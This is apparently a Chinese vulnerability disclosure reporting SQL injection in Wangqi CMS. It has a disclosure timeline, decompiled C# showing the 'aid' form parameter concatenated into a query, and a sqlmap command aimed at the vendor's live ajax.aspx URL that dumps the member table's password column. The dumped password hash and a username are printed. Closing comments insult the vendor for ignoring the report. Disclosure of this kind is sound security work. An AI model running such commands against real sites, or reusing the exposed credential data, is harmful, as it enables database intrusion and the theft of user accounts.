2014-06-18: 细节已通知厂商并且等待厂商处理中 2014-06-23: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-08-17: 细节向核心白帽子及相关领域专家公开 2014-08-27: 细节向普通白帽子公开 2014-09-06: 细节向实习白帽子公开 2014-09-13: 细节向公众公开
网奇cms最新版sql注入
http://cms.wangqi.com/ajax.aspx
public void Page_Load(object sender, EventArgs e){ switch (base.Request.Form["cmd"]) { ...... case "artlist": this.method_9(); //跟进 return;
private void method_9(){ string str = base.Request.Form["cid"]; string str2 = base.Request.Form["aid"]; //没处理存在注入 string str3 = "{\"result\":"; if (!string.IsNullOrEmpty(str) && (int.Parse(str) > 0)) { bool flag = true; str3 = str3 + "1,\"data\":["; string cmdText = "select e.ID,eName,vName,eCss from wqcms_expand e left join wqcms_extval v on v.eID=e.ID where nID=" + str2 + " and clsID=" + str + " order by eSort asc"; IDataReader reader = base.dbHelper.ExecuteReader(CommandType.Text, cmdText, new IDataParameter[0]); while (reader.Read()) { if (flag) { flag = false; } object obj3 = str3; str3 = string.Concat(new object[] { obj3, "{\"id\":\"", reader["ID"], "\",\"name\":\"", this.method_10(base.Server.HtmlDecode(reader["eName"].ToString())), "\",\"val\":\"", ((reader["vName"] == DBNull.Value) | (reader["vName"] == null)) ? "" : this.method_10(base.Server.HtmlDecode(reader["vName"].ToString())), "\",\"css\":\"", this.method_10(base.Server.HtmlDecode(reader["eCss"].ToString())), "\"}," }); } str3 = str3.TrimEnd(new char[] { ',' }); reader.Close(); if (flag) { cmdText = "select ID,eName,eCss from wqcms_expand where clsID=" + str + " order by eSort asc"; reader = base.dbHelper.ExecuteReader(CommandType.Text, cmdText, new IDataParameter[0]); while (reader.Read()) { object obj2 = str3; str3 = string.Concat(new object[] { obj2, "{\"id\":\"", reader["ID"], "\",\"name\":\"", this.method_10(base.Server.HtmlDecode(reader["eName"].ToString())), "\",\"val\":\"\",\"css\":\"\"}," }); } str3 = str3.TrimEnd(new char[] { ',' }); reader.Close(); } str3 = str3 + "]"; } else { str3 = str3 + "0"; } str3 = str3 + "}"; this.method_32(str3);}
利用sqlmap
Sqlmap -u http://cms.wangqi.com/ajax.aspx --data "cmd=artlist&cid=3&aid=100" -p "aid" --dump -C "password" -T "wqcms_member"
+----------------------------------+| password |+----------------------------------+| 189342E2ED9D23BB9A02ECBF8ED06762 |+----------------------------------+
+-------+| name |+-------+| abcde |+-------+
对aid参数进行处理
危害等级:无影响厂商忽略
忽略时间:2014-09-13 15:56
暂无
这傻鸟厂商老是忽略,害我白白拉他们来注册,@疯狗 注销他的账号吧
@Mosuan 哎 蛋疼